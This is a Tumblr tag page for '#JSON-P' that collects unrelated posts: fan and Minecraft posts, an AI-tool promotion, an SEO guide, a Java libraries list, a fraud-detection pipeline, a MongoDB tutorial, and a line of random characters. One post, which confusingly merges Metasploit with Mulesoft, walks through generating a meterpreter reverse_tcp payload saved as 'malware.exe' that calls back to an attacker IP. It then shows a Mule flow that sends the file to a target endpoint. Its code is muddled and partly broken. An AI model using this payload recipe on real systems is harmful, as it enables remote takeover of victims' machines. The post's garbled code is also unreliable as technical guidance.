#JSON-P
Explore tagged Tumblr posts
relto · 2 years ago
Text
my server now properly reads out values and displays them..!!
1 note · View note
ultrio325 · 7 months ago
Text
To All Rain World Artists
Currently working on a project about iterator OCs, need as many of them as possible
If you want your OC featured, reblog this post with your iterator OC!
Do rainworld reblog so your rainworld friends can rainworld see this rainworld post thx ^^ :P
Details:
A friend and I noticed that Limbus Company EGO gifts' names are quite similar to Iterator names, so I'm trying to make a minigame of "Is that an Iterator OC or an EGO Gift", all iterator OCs will be credited with artist name, link and image
Edit: Turns out confirming "JSON Added" for everyone is very exhausting, so from now on if you got in you will not be notified
Also if you want to make my job easier, it'd be nice to leave your OCs in this format:
{ "name": "[Name Here Capitalized Yes Even Articles Like The And A]", "image": "[image.link.here]", "owner": "[Your Name Here]", "ownerLink": "[link.to.your.blog.or.site.or.whatever.here]" }
Danke sehr!
29 notes · View notes
Note
-.-. .- -. / -.-- --- ..- / .... . .- .-. / -- . ..--.. /
.--. . - . .-.
can you hear me? i can’t understand the first letter at the bottom but then e then something maybe n and then r
so can you hear me? wait thats a p and a t
can you hear me? peter
PETER
i can hear you!!!
@json-todd somethings wrong
23 notes · View notes
cornbread-but-minecraft · 1 year ago
Text
Tumblr media Tumblr media
version 1.2.0 of Thickly Be-Beveled Buttons on bedrock edition as well as the new java edition port are now available on planet minecraft and modrinth! featuring new subpacks and new compatibility, as well as a few miscellaneous additions and tweaks.
links coming in a reblog, changelog under cut:
on bedrock, pack version 1.2.0:
Updated Enchanting Table Screen when using CrisXolt's VDX Legacy Desktop UI. It no longer runs into visual issues with Screen Animations enabled, and its Empty Lapis Slot now uses its updated texture to match the Smithing Table Screen. (Edited texture)
The rest of the GUI is now compatible with CrisXolt's VDX Legacy Desktop UI since Thickly Be-Beveled Buttons got a Java Edition port. (Added textures)
The Title Screen Buttons are now compatible with CrisXolt's VDX Old Days UI . (Added textures)
Added Subpacks to choose the color buttons turn when hovering over them! The options are Modern Green and Classic Blue (does not affect Container Screens or CrisXolt's packs. (Edited JSON, added textures)
Tweaked the color pallet for hovering over dark buttons (in green mode) to look less broken. (Edited texture)
Textured the "Verbose Button" on the Sidebar, because I missed it before. (Added texture)
Fixed the "Verbose Button" on the Sidebar, because it's completely broken in vanilla. (Added JSON, added textures)
on java, nothing. since this is the first version, there is no changelog :P
5 notes · View notes
mulemasters · 11 months ago
Text
Metasploit: Setting a Custom Payload Mulesoft
To transform and set a custom payload in Metasploit and Mulesoft, you need to follow specific steps tailored to each platform. Here are the detailed steps for each:
Metasploit: Setting a Custom Payload
Open Metasploit Framework:
msfconsole
Select an Exploit:
use exploit/multi/handler
Configure the Payload:
set payload <payload_name>
Replace <payload_name> with the desired payload, for example: set payload windows/meterpreter/reverse_tcp
Set the Payload Options:
set LHOST <attacker_IP> set LPORT <attacker_port>
Replace <attacker_IP> with your attacker's IP address and <attacker_port> with the port you want to use.
Generate the Payload:
msfvenom -p <payload_name> LHOST=<attacker_IP> LPORT=<attacker_port> -f <format> -o <output_file>
Example: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe
Execute the Handler:
exploit
Mulesoft: Transforming and Setting Payload
Open Anypoint Studio: Open your Mulesoft Anypoint Studio to design and configure your Mule application.
Create a New Mule Project:
Go to File -> New -> Mule Project.
Enter the project name and finish the setup.
Configure the Mule Flow:
Drag and drop a HTTP Listener component to the canvas.
Configure the HTTP Listener by setting the host and port.
Add a Transform Message Component:
Drag and drop a Transform Message component after the HTTP Listener.
Configure the Transform Message component to define the input and output payload.
Set the Payload:
In the Transform Message component, set the payload using DataWeave expressions. Example:
%dw 2.0 output application/json --- { message: "Custom Payload", timestamp: now() }
Add Logger (Optional):
Drag and drop a Logger component to log the transformed payload for debugging purposes.
Deploy and Test:
Deploy the Mule application.
Use tools like Postman or cURL to send a request to your Mule application and verify the custom payload transformation.
Example: Integrating Metasploit with Mulesoft
If you want to simulate a scenario where Mulesoft processes payloads for Metasploit, follow these steps:
Generate Payload with Metasploit:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /tmp/malware.exe
Create a Mule Flow to Handle the Payload:
Use the File connector to read the generated payload file (malware.exe).
Transform the file content if necessary using a Transform Message component.
Send the payload to a specified endpoint or store it as required. Example Mule flow:
<file:read doc:name="Read Payload" path="/tmp/malware.exe"/> <dw:transform-message doc:name="Transform Payload"> <dw:set-payload><![CDATA[%dw 2.0 output application/octet-stream --- payload]]></dw:set-payload> </dw:transform-message> <http:request method="POST" url="http://target-endpoint" doc:name="Send Payload"> <http:request-builder> <http:header headerName="Content-Type" value="application/octet-stream"/> </http:request-builder> </http:request>
Following these steps, you can generate and handle custom payloads using Metasploit and Mulesoft. This process demonstrates how to effectively create, transform, and manage payloads across both platforms.
3 notes · View notes
asocialpessimist · 2 years ago
Text
URL Tag Game
thanks for the tag @yellobb 🩷
Rules: spell your url with song titles and tag as many people as the letters!
a - Am I Dreaming - Metro Boomin
s - she's my religion - pale waves
o - one step closer - Linkin Park
c - cardboard box - FLO
i - I'm tired - Labrint & Zendaya
a - ain't no love in the heart of the city - Bobby Bland
l - little monster - royal blood
p - people pleaser - Cat Burns
e - everybody dies - billie eilish
s - she knows it - Maggie Lindemann
s - stop crying your heart out - oasis
i - I Am My Own Muse - Fall Out Boy
m - more - the warning
i - it's not over - Daughtry
s - sono un bravo ragazzo un po' fuori di testa - Random
t - the news - paramore
tagging: @time-traveling-machine @nausikaaa @dreamingkc @thearchdemongreatlydisapproves @sleepingfancies @messy-celestial @lilorockz @larkral @json-derulo @whyarewewlwlikethat @chaotic-autumn @ionlydrinkhotwater @excalisbury @swampvoid @hellfirelady @saffroncastle
9 notes · View notes
tsreviews · 1 year ago
Text
AvatoAI Review: Unleashing the Power of AI in One Dashboard
Tumblr media
Here's what Avato Ai can do for you
Data Analysis:
Analyze CV, Excel, or JSON files using Python and libraries like pandas or matplotlib.
Clean data, calculate statistical information and visualize data through charts or plots.
Document Processing:
Extract and manipulate text from text files or PDFs.
​Perform tasks such as searching for specific strings, replacing content, and converting text to different formats.
Image Processing:
Upload image files for manipulation using libraries like OpenCV.
​Perform operations like converting images to grayscale, resizing, and detecting shapes or
Machine Learning:
Utilize Python's machine learning libraries for predictions, clustering, natural language processing, and image recognition by uploading
Versatile & Broad Use Cases:
An incredibly diverse range of applications. From creating inspirational art to modeling scientific scenarios, to designing novel game elements, and more.
User-Friendly API Interface:
Access and control the power of this advanced Al technology through a user-friendly API.
​Even if you're not a machine learning expert, using the API is easy and quick.
Customizable Outputs:
Lets you create custom visual content by inputting a simple text prompt.
​The Al will generate an image based on your provided description, enhancing the creativity and efficiency of your work.
Stable Diffusion API:
Enrich Your Image Generation to Unprecedented Heights.
Stable diffusion API provides a fine balance of quality and speed for the diffusion process, ensuring faster and more reliable results.
Multi-Lingual Support:
Generate captivating visuals based on prompts in multiple languages.
Set the panorama parameter to 'yes' and watch as our API stitches together images to create breathtaking wide-angle views.
Variation for Creative Freedom:
Embrace creative diversity with the Variation parameter. Introduce controlled randomness to your generated images, allowing for a spectrum of unique outputs.
Efficient Image Analysis:
Save time and resources with automated image analysis. The feature allows the Al to sift through bulk volumes of images and sort out vital details or tags that are valuable to your context.
Advance Recognition:
The Vision API integration recognizes prominent elements in images - objects, faces, text, and even emotions or actions.
Interactive "Image within Chat' Feature:
Say goodbye to going back and forth between screens and focus only on productive tasks.
​Here's what you can do with it:
Visualize Data:
Create colorful, informative, and accessible graphs and charts from your data right within the chat.
​Interpret complex data with visual aids, making data analysis a breeze!
Manipulate Images:
Want to demonstrate the raw power of image manipulation? Upload an image, and watch as our Al performs transformations, like resizing, filtering, rotating, and much more, live in the chat.
Generate Visual Content:
Creating and viewing visual content has never been easier. Generate images, simple or complex, right within your conversation
Preview Data Transformation:
If you're working with image data, you can demonstrate live how certain transformations or operations will change your images.
This can be particularly useful for fields like data augmentation in machine learning or image editing in digital graphics.
Effortless Communication:
Say goodbye to static text as our innovative technology crafts natural-sounding voices. Choose from a variety of male and female voice types to tailor the auditory experience, adding a dynamic layer to your content and making communication more effortless and enjoyable.
Enhanced Accessibility:
Break barriers and reach a wider audience. Our Text-to-Speech feature enhances accessibility by converting written content into audio, ensuring inclusivity and understanding for all users.
Customization Options:
Tailor the audio output to suit your brand or project needs.
​From tone and pitch to language preferences, our Text-to-Speech feature offers customizable options for the truest personalized experience.
>>>Get More Info<<<
3 notes · View notes
tccpartnersagency · 11 days ago
Text
Kỹ thuật SEO website A-Z cho người mới bắt đầu
Kỹ thuật SEO website đóng vai trò then chốt trong quá trình tối ưu hóa trang web cho các công cụ tìm kiếm. Đây không chỉ là một phần của SEO mà còn là nền tảng cốt lõi quyết định hiệu quả của mọi chiến lược SEO khác. Kỹ thuật SEO giúp công cụ tìm kiếm truy cập, thu thập, diễn giải và lập chỉ mục website một cách hiệu quả, không gặp trở ngại kỹ thuật nào.
Tumblr media
Tầm Quan Trọng Của Kỹ Thuật SEO Website
Kỹ thuật SEO website được ví như phần móng của một ngôi nhà. Nếu móng yếu, dù nội thất bên trong (nội dung) có đẹp đến đâu, ngôi nhà vẫn không thể vững chắc. Theo nhiều nghiên cứu, 30-40% các vấn đề về xếp hạng tìm kiếm bắt nguồn từ lỗi kỹ thuật SEO. Ngay cả khi bạn có nội dung xuất sắc và backlink chất lượng cao, những vấn đề kỹ thuật như thời gian tải chậm hay lỗi crawl budget có thể khiến website của bạn không đạt được thứ hạng xứng đáng.
Các Yếu Tố Kỹ Thuật SEO Nền Tảng
1. Xác Định Tên Miền Ưu Tiên
Một website có thể truy cập được qua nhiều URL khác nhau (www và non-www, HTTP và HTTPS). Điều này gây nhầm lẫn cho công cụ tìm kiếm và dẫn đến vấn đề nội dung trùng lặp.
Thực hiện:
Chọn tên miền ưu tiên (ví dụ: https://www.example.com)
Thiết lập chuyển hướng 301 từ các biến thể khác
Cấu hình tên miền ưu tiên trong Google Search Console
2. Tối Ưu Hóa Robots.txt
File robots.txt đặt tại thư mục gốc của website cung cấp hướng dẫn cho các bot tìm kiếm. Một file robots.txt được tối ưu hóa hợp lý sẽ:
Cấu trúc tiêu chuẩn:
User-agent: [tên bot]
Disallow: [đường dẫn cấm]
Allow: [đường dẫn cho phép]
Sitemap: [URL sitemap]
Các phần cần disallow thông thường:
Trang admin, quản trị hệ thống
Trang tạm (staging)
Trang tìm kiếm nội bộ
Trang lọc sản phẩm không có giá trị SEO
3. Cấu Trúc URL Thân Thiện
URL thân thiện với SEO cần tuân thủ các nguyên tắc:
Ngắn gọn, mô tả, dễ đọc
Sử dụng ký tự chữ thường
Phân tách từ bằng dấu gạch ngang (-)
Bao gồm từ khóa mục tiêu
Tránh tham số URL phức tạp (?, &, =)
Ví dụ tốt: https://example.com/ky-thuat-seo-website Ví dụ kém: https://example.com/p=123?id=456
4. Canonical URL
Thẻ canonical giúp xác định phiên bản chính của trang khi có nhiều URL chứa nội dung tương tự, tránh vấn đề nội dung trùng lặp.
Cách triển khai:
html
<link rel="canonical" href="https://example.com/trang-chinh" />
5. Breadcrumbs Tối Ưu
Breadcrumbs không chỉ hỗ trợ người dùng điều hướng mà còn cung cấp cho Google hiểu về cấu trúc website.
Ví dụ code mẫu với schema markup:
html
<ol itemscope itemtype="https://schema.org/BreadcrumbList">
  <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
    <a itemprop="item" href="https://example.com/"><span itemprop="name">Trang chủ</span></a>
    <meta itemprop="position" content="1" />
  </li>
  <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
    <a itemprop="item" href="https://example.com/seo/"><span itemprop="name">SEO</span></a>
    <meta itemprop="position" content="2" />
  </li>
  <li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem">
    <span itemprop="name">Kỹ thuật SEO Website</span>
    <meta itemprop="position" content="3" />
  </li>
</ol>
Tối Ưu Hóa Kỹ Thuật SEO Nâng Cao
1. Tối Ưu Hóa Tốc Độ Tải Trang
Theo nghiên cứu của Google, 53% người dùng sẽ rời bỏ trang web nếu thời gian tải vượt quá 3 giây. Tốc độ tải trang là yếu tố xếp hạng trực tiếp.
Các biện pháp cải thiện:
Nâng cấp hosting lên PHP 8.x (cải thiện 30-50% hiệu suất so với PHP 7.x)
Sử dụng CDN phân phối nội dung
Tối ưu hóa hình ảnh (WebP, lazy loading)
Minify và nén JavaScript, CSS
Giảm thiểu HTTP requests
Sử dụng browser caching
Kích hoạt GZIP compression
2. Dữ Liệu Có Cấu Trúc (Schema Markup)
Schema markup giúp Google hiểu ngữ cảnh của nội dung, tạo ra rich snippets trong kết quả tìm kiếm.
Các loại schema quan trọng:
Organization
WebSite
BreadcrumbList
Article/BlogPosting
Product
FAQ
LocalBusiness
Ví dụ schema cho bài viết:
json
{
  "@context": "https://schema.org",
  "@type": "Article",
  "headline": "Kỹ Thuật SEO Website: Nền Tảng Vững Chắc",
  "author": {
    "@type": "Person",
    "name": "TCC & Partners"
  },
  "datePublished": "2025-04-26",
  "image": "https://example.com/image.jpg",
  "publisher": {
    "@type": "Organization",
    "name": "TCC & Partners",
    "logo": {
      "@type": "ImageObject",
      "url": "https://example.com/logo.jpg"
    }
  }
}
3. Tối Ưu Hóa XML Sitemap
XML Sitemap giúp công cụ tìm kiếm hiểu cấu trúc và tìm thấy nội dung quan trọng trên website.
Thực hành tốt nhất:
Chỉ bao gồm URL quan trọng, có chất lượng
Loại bỏ trang có noindex, trang tác giả không có giá trị
Nhóm theo loại nội dung (bài viết, sản phẩm, trang)
Cập nhật tự động khi có nội dung mới
Giới hạn dưới 50,000 URL/file và kích thước dưới 50MB
Gửi sitemap đến Google Search Console và Bing Webmaster Tools
4. HTTPS Và Bảo Mật
HTTPS không chỉ là yếu tố xếp hạng mà còn tăng lòng tin của người dùng. Theo nghiên cứu, tỷ lệ thoát giảm 10-15% khi website sử dụng HTTPS.
Quy trình chuyển sang HTTPS:
Mua và cài đặt chứng chỉ SSL (Lựa chọn chứng chỉ EV, OV hoặc DV)
Cập nhật các liên kết nội bộ từ HTTP sang HTTPS
Thiết lập chuyển hướng 301 từ HTTP sang HTTPS
Cập nhật các tham chiếu canonical
Cập nhật tên miền ưu tiên trong Google Search Console
Kiểm tra mixed content và sửa lỗi
5. Tối Ưu Hóa Mobile-First Indexing
Google hiện sử dụng phiên bản mobile để lập chỉ mục và xếp hạng. Website không thân thiện với di động sẽ bị ảnh hưởng nghiêm trọng.
Các yếu tố quan trọng:
Thiết kế responsive
Nội dung và cấu trúc đồng nhất giữa desktop và mobile
Tốc độ tải mobile dưới 2.5 giây
Kích thước font và nút bấm phù hợp với thao tác chạm
Không sử dụng Flash hoặc popup xâm lấn
Tối ưu hóa Core Web Vitals cho mobile
6. Phân Trang Và Quốc Tế Hóa
Phân trang tối ưu:
Sử dụng rel="next" và rel="prev" (mặc dù Google không còn sử dụng nhưng vẫn có lợi cho SEO tổng thể)
Sử dụng chỉ mục tự động thay vì noindex cho trang phân trang
Cân nhắc infinite scroll với URL riêng cho từng trang
Quốc tế hóa website:
Sử dụng hreflang để chỉ định phiên bản ngôn ngữ/khu vực
html
<link rel="alternate" hreflang="en-us" href="https://example.com/en-us/page" />
<link rel="alternate" hreflang="vi-vn" href="https://example.com/vi-vn/page" />
Sử dụng cấu trúc URL phù hợp (thư mục /vi-vn/, tên miền phụ vi.example.com, hoặc TLD example.vn)
Kiểm Tra Và Theo Dõi Kỹ Thuật SEO
Công Cụ Kiểm Tra Kỹ Thuật SEO
Google Search Console: Kiểm tra lỗi thu thập, lập chỉ mục và hiệu suất
PageSpeed Insights: Đánh giá tốc độ tải trang
Mobile-Friendly Test: Kiểm tra tính thân thiện với di động
Screaming Frog: Crawl toàn diện website
Ahrefs/Semrush: Phân tích kỹ thuật SEO toàn diện
Danh Mục Kiểm Tra Kỹ Thuật SEO
Xác định tên miền ưu tiên và thiết lập chuyển hướng
Kiểm tra và tối ưu hóa robots.txt
Rà soát và cải thiện cấu trúc URL
Đánh giá và tối ưu cấu trúc website
Tối ưu thẻ canonical
Trang 404 tùy chỉnh và thân thiện
Kiểm tra tốc độ tải và thực hiện cải thiện
Đánh giá và nâng cao tính thân thiện mobile
Triển khai HTTPS và sửa lỗi mixed content
Tối ưu hóa XML sitemap và gửi đến công cụ tìm kiếm
Thêm dữ liệu có cấu trúc cho các trang quan trọng
Kiểm tra Core Web Vitals và cải thiện các chỉ số LCP, FID, CLS
Chuyên Gia Kỹ Thuật SEO Website
Thành lập từ năm 2018, TCC & Partners định hướng phát triển thành đơn vị Marketing truyền thông tích hợp độc lập, chuyên cung cấp giải pháp chiến lược, sáng tạo và phát triển thương hiệu nhằm tối ưu hoá giá trị trong từng sản phẩm, đem lại tối đa hiệu quả trên từng chi phí bỏ ra cho các đơn vị đối tác.
Với đội ngũ chuyên gia kỹ thuật SEO giàu kinh nghiệm, TCC & Partners cung cấp dịch vụ đánh giá và tối ưu hóa kỹ thuật SEO website toàn diện, giúp doanh nghiệp xây dựng nền tảng vững chắc cho chiến lược SEO dài hạn. Phương pháp tiếp cận của chúng tôi dựa trên dữ liệu thực tế, tuân thủ hướng dẫn mới nhất từ Google, đảm bảo website của bạn luôn đạt chuẩn kỹ thuật cao nhất. 
Kỹ thuật SEO website là nền tảng không thể thiếu cho mọi chiến lược SEO hiệu quả. Khi cơ sở hạ tầng kỹ thuật được tối ưu hóa, các nỗ lực SEO nội dung và xây dựng liên kết sẽ phát huy tối đa hiệu quả, mang lại thứ hạng cao và bền vững trên các công cụ tìm kiếm.
0 notes
softcrayons4455 · 12 days ago
Text
10 Must-Know Java Libraries for Developers
Java remains one of the most powerful and versatile programming languages in the world. Whether you are just starting your journey with Java or already a seasoned developer, mastering essential libraries can significantly improve your coding efficiency, application performance, and overall development experience. If you are considering Java as a career, knowing the right libraries can set you apart in interviews and real-world projects. In this blog we will explore 10 must-know Java libraries that every developer should have in their toolkit.
Tumblr media
1. Apache Commons
Apache Commons is like a Swiss Army knife for Java developers. It provides reusable open-source Java software components covering everything from string manipulation to configuration management. Instead of reinventing the wheel, you can simply tap into the reliable utilities offered here.
2. Google Guava
Developed by Google engineers, Guava offers a wide range of core libraries that include collections, caching, primitives support, concurrency libraries, common annotations, string processing, and much more. If you're aiming for clean, efficient, and high-performing code, Guava is a must.
3. Jackson
Working with JSON data is unavoidable today, and Jackson is the go-to library for processing JSON in Java. It’s fast, flexible, and a breeze to integrate into projects. Whether it's parsing JSON or mapping it to Java objects, Jackson gets the job done smoothly.
4. SLF4J and Logback
Logging is a critical part of any application, and SLF4J (Simple Logging Facade for Java) combined with Logback offers a powerful logging framework. SLF4J provides a simple abstraction for various logging frameworks, and Logback is its reliable, fast, and flexible implementation.
5. Hibernate ORM
Handling database operations becomes effortless with Hibernate ORM. It maps Java classes to database tables, eliminating the need for complex JDBC code. For anyone aiming to master backend development, getting hands-on experience with Hibernate is crucial.
6. JUnit
Testing your code ensures fewer bugs and higher quality products. JUnit is the leading unit testing framework for Java developers. Writing and running repeatable tests is simple, making it an essential part of the development workflow for any serious developer.
7. Mockito
Mockito helps you create mock objects for unit tests. It’s incredibly useful when you want to test classes in isolation without dealing with external dependencies. If you're committed to writing clean and reliable code, Mockito should definitely be in your toolbox.
8. Apache Maven
Managing project dependencies manually can quickly become a nightmare. Apache Maven simplifies the build process, dependency management, and project configuration. Learning Maven is often part of the curriculum in the best Java training programs because it’s such an essential skill for developers.
9. Spring Framework
The Spring Framework is practically a requirement for modern Java developers. It supports dependency injection, aspect-oriented programming, and offers comprehensive infrastructure support for developing Java applications. If you’re planning to enroll in the best Java course, Spring is something you’ll definitely want to master.
10. Lombok
Lombok is a clever little library that reduces boilerplate code in Java classes by automatically generating getters, setters, constructors, and more using annotations. This means your code stays neat, clean, and easy to read.
Conclusion
Choosing Java as a career is a smart move given the constant demand for skilled developers across industries. But mastering the language alone isn't enough—you need to get comfortable with the libraries that real-world projects rely on. If you are serious about becoming a proficient developer, make sure you invest in the best Java training that covers not only core concepts but also practical usage of these critical libraries. Look for the best Java course that blends hands-on projects, mentorship, and real-world coding practices. With the right skills and the right tools in your toolkit, you'll be well on your way to building powerful, efficient, and modern Java applications—and securing a bright future in this rewarding career path.
0 notes
renatoferreiradasilva · 2 months ago
Text
Documentação do Fraud Detection Pipeline com Streaming, AutoML e UI
Introdução
Este código implementa um pipeline avançado de detecção de fraudes que cobre desde a coleta de dados em tempo real até a implantação de um modelo otimizado. Ele utiliza streaming com Kafka, AutoML para otimização do modelo e uma interface interativa com Streamlit para análise dos resultados.
📌 Funcionalidades Principais
Coleta de Dados em Tempo Real
O pipeline consome dados do Apache Kafka e processa-os em tempo real.
Pré-processamento Avançado
Normalização dos dados com StandardScaler.
Remoção de outliers usando IsolationForest.
Balanceamento de classes desbalanceadas (fraudes são minoritárias).
Treinamento e Otimização de Modelos
Uso de FLAML (AutoML) para encontrar o melhor modelo e hiperparâmetros.
Testa diferentes algoritmos automaticamente para obter o melhor desempenho.
Monitoramento Contínuo de Drift
Teste Kolmogorov-Smirnov (KS Test) para identificar mudanças nas distribuições das features.
Page-Hinkley Test para detecção de mudanças nos padrões de predição.
Conversão para ONNX
Modelo final convertido para ONNX para permitir inferência otimizada.
Interface Gráfica com Streamlit
Visualização dos resultados em tempo real.
Alerta de drift nos dados, permitindo auditoria contínua.
📌 Bibliotecas Utilizadas
🔹 Processamento de Dados
numpy, pandas, scipy.stats
sklearn.preprocessing.StandardScaler
sklearn.ensemble.IsolationForest
🔹 Modelagem e AutoML
xgboost, lightgbm
flaml.AutoML (AutoML para otimização de hiperparâmetros)
🔹 Streaming e Processamento em Tempo Real
kafka.KafkaConsumer
river.drift.PageHinkley
🔹 Deploy e Inferência
onnxmltools, onnxruntime
streamlit (para UI)
📌 Fluxo do Código
1️⃣ Coleta de Dados em Tempo Real
O código inicia um Kafka Consumer para coletar novas transações.
2️⃣ Pré-processamento
Normalização: Ajusta os dados para uma escala padrão.
Remoção de outliers: Evita que transações muito discrepantes impactem o modelo.
3️⃣ Treinamento e AutoML
O FLAML testa vários modelos e escolhe o melhor com base no desempenho.
O modelo final é armazenado para inferência.
4️⃣ Monitoramento de Drift
KS-Test compara os dados novos com o conjunto de treino.
Page-Hinkley detecta mudanças nos padrões de classificação.
5️⃣ Conversão ONNX e Inferência
O modelo é convertido para ONNX para tornar a inferência mais rápida e eficiente.
6️⃣ Interface de Usuário
Streamlit exibe o resultado da predição e alerta sobre mudanças inesperadas nos dados.
📌 Exemplo de Uso
1️⃣ Iniciar um servidor Kafka Certifique-se de que um servidor Kafka está rodando com um tópico chamado "fraud-detection".
2️⃣ Executar o Código Basta rodar o script Python, e ele automaticamente:
Coletará dados do Kafka.
Processará os dados e fará a predição.
Atualizará a interface gráfica com os resultados.
3️⃣ Ver Resultados no Streamlit Para visualizar os resultados:streamlit run nome_do_script.py
Isso abrirá uma interface interativa mostrando as predições de fraude.
📌 Possíveis Melhorias
Adicionar explicabilidade com SHAP para entender melhor as decisões do modelo.
Integração com banco de dados NoSQL (como MongoDB) para armazenar logs.
Implementação de um sistema de alertas via e-mail ou Slack.
📌 Conclusão
Este pipeline fornece uma solução robusta para detecção de fraudes em tempo real. Ele combina streaming, aprendizado de máquina automatizado, monitoramento e UI para tornar a análise acessível e escalável.
🚀 Pronto para detectar fraudes com eficiência! 🚀
"""
import numpy as np import pandas as pd import xgboost as xgb import lightgbm as lgb import shap import json import datetime import onnxmltools import onnxruntime as ort import streamlit as st from kafka import KafkaConsumer from sklearn.ensemble import IsolationForest from sklearn.preprocessing import StandardScaler from sklearn.model_selection import train_test_split from sklearn.metrics import precision_score, recall_score, roc_auc_score, precision_recall_curve from scipy.stats import ks_2samp from river.drift import PageHinkley from flaml import AutoML from onnxmltools.convert.common.data_types import FloatTensorType from sklearn.datasets import make_classification
====================
CONFIGURAÇÃO DE STREAMING
====================
kafka_topic = "fraud-detection" kafka_consumer = KafkaConsumer( kafka_topic, bootstrap_servers="localhost:9092", value_deserializer=lambda x: json.loads(x.decode('utf-8')) )
====================
GERAÇÃO DE DADOS
====================
X, y = make_classification( n_samples=5000, n_features=10, n_informative=5, n_redundant=2, weights=[0.95], flip_y=0.01, n_clusters_per_class=2, random_state=42 )
====================
PRÉ-PROCESSAMENTO
====================
X_train_raw, X_test_raw, y_train, y_test = train_test_split( X, y, test_size=0.2, stratify=y, random_state=42 )
scaler = StandardScaler() X_train_scaled = scaler.fit_transform(X_train_raw) X_test_scaled = scaler.transform(X_test_raw)
outlier_mask = np.zeros(len(X_train_scaled), dtype=bool) for class_label in [0, 1]: mask_class = (y_train == class_label) iso = IsolationForest(contamination=0.01, random_state=42) outlier_mask[mask_class] = (iso.fit_predict(X_train_scaled[mask_class]) == 1)
X_train_clean, y_train_clean = X_train_scaled[outlier_mask], y_train[outlier_mask]
====================
MODELAGEM COM AutoML
====================
auto_ml = AutoML() auto_ml.fit(X_train_clean, y_train_clean, task="classification", time_budget=300)
best_model = auto_ml.model
====================
MONITORAMENTO DE DRIFT E LOGGING
====================
drift_features = [i for i in range(X_train_clean.shape[1]) if ks_2samp(X_train_clean[:, i], X_test_scaled[:, i])[1] < 0.01]
ph = PageHinkley(threshold=30, alpha=0.99) drift_detected = any(ph.update(prob) and ph.drift_detected for prob in best_model.predict_proba(X_test_scaled)[:, 1])
log_data = { "timestamp": datetime.datetime.now().isoformat(), "drift_features": drift_features, "concept_drift": drift_detected, "train_size": len(X_train_clean), "test_size": len(X_test_scaled), "class_ratio": f"{sum(y_train_clean)/len(y_train_clean):.4f}" }
with open("fraud_detection_audit.log", "a") as f: f.write(json.dumps(log_data) + "\n")
if drift_detected or drift_features: print("🚨 ALERTA: Mudanças significativas detectadas no padrão dos dados!")
====================
DEPLOYMENT - CONVERSÃO PARA ONNX
====================
initial_type = [('float_input', FloatTensorType([None, X_train_clean.shape[1]]))] model_onnx = onnxmltools.convert_lightgbm(best_model, initial_types=initial_type)
with open("fraud_model.onnx", "wb") as f: f.write(model_onnx.SerializeToString())
====================
INTERFACE COM STREAMLIT
====================
st.title("📊 Detecção de Fraude em Tempo Real")
if st.button("Atualizar Dados"): message = next(kafka_consumer) new_data = np.array(message.value["features"]).reshape(1, -1) scaled_data = scaler.transform(new_data) pred = best_model.predict(scaled_data) prob = best_model.predict_proba(scaled_data)[:, 1]st.write(f"**Predição:** {'Fraude' if pred[0] else 'Não Fraude'}") st.write(f"**Probabilidade de Fraude:** {prob[0]:.4f}") drift_detected = any(ph.update(prob[0]) and ph.drift_detected) if drift_detected: st.warning("⚠️ Drift detectado nos dados!")
0 notes
carabde · 3 months ago
Text
🚀 Maîtrisez les Requêtes MongoDB avec find() et findOne() !
MongoDB est une base de données NoSQL puissante, conçue pour gérer des données flexibles et non structurées. Contrairement aux bases SQL traditionnelles, MongoDB stocke les données sous forme de documents JSON, ce qui permet une manipulation plus souple et intuitive.
📌 Mais comment interroger efficacement une base de données MongoDB ? C’est là que les méthodes find() et findOne() entrent en jeu !
Dans ma nouvelle vidéo YouTube, je vous guide pas à pas pour comprendre et exploiter ces méthodes essentielles.
🔍 Comprendre find() et findOne() en MongoDB
📌 La méthode find() La méthode find() est utilisée pour récupérer tous les documents d’une collection correspondant à une condition spécifique. Elle est idéale pour extraire un ensemble de résultats et les manipuler dans votre application.
Exemple : Trouver tous les produits avec un prix supérieur à 10 000 :db.products.find({ price: { $gt: 10000 } })
💡 Ici, l’opérateur $gt signifie "greater than", donc seuls les produits dont le prix est supérieur à 10 000 seront affichés.
📌 La méthode findOne() Si vous souhaitez récupérer un seul document correspondant à votre requête, utilisez findOne(). Cette méthode est particulièrement utile pour trouver un élément unique dans une base de données, comme un utilisateur spécifique ou un produit précis.
Exemple : Trouver le premier produit dont le nom commence par "P" :db.products.findOne({ name: { $regex: /^P/ } })
💡 Ici, nous utilisons $regex pour appliquer une expression régulière, ce qui permet de rechercher tous les produits dont le nom commence par "P".
💡 Opérateurs avancés pour requêtes complexes
MongoDB ne se limite pas aux simples requêtes ! Il propose une multitude d’opérateurs logiques et de comparaison pour affiner vos résultats.
🔹 Opérateurs de comparaison :
$eq → Égalité ({ price: { $eq: 5000 } })
$gt → Supérieur ({ price: { $gt: 10000 } })
$gte → Supérieur ou égal
$lt → Inférieur
$lte → Inférieur ou égal
$ne → Différent
🔹 Opérateurs logiques :
$and → Combine plusieurs conditions
$or → Renvoie les documents correspondant à l’une des conditions
$in → Vérifie si une valeur est dans un tableau donné
$nin → Vérifie si une valeur n’est pas dans un tableau
Exemple : Trouver tous les produits de la catégorie "Électronique" dont le prix est supérieur à 10 000 :db.products.find({     $and: [        { price: { $gt: 10000 } },        { category: "Electronics" }    ]})
💡 Explication :
L’opérateur $and permet de combiner plusieurs conditions.
Ici, on recherche les produits qui sont à la fois dans la catégorie "Electronics" ET dont le prix est supérieur à 10 000.
🎥 Regardez la vidéo complète sur YouTube !
Dans ma vidéo, je vous montre chaque étape en détail, avec des exemples pratiques pour que vous puissiez mettre immédiatement en application ces concepts dans vos propres projets MongoDB.
🎥 Regardez la vidéo ici : [Lien vers la vidéo]
💬 Des questions ? Besoin d’aide pour structurer vos requêtes MongoDB ? Partagez vos commentaires et je serai ravi d’y répondre !
📢 Suivez-moi pour plus de tutoriels tech, programmation et bases de données !
1 note · View note
digitalmore · 4 months ago
Text
0 notes
postsofbabel · 4 months ago
Text
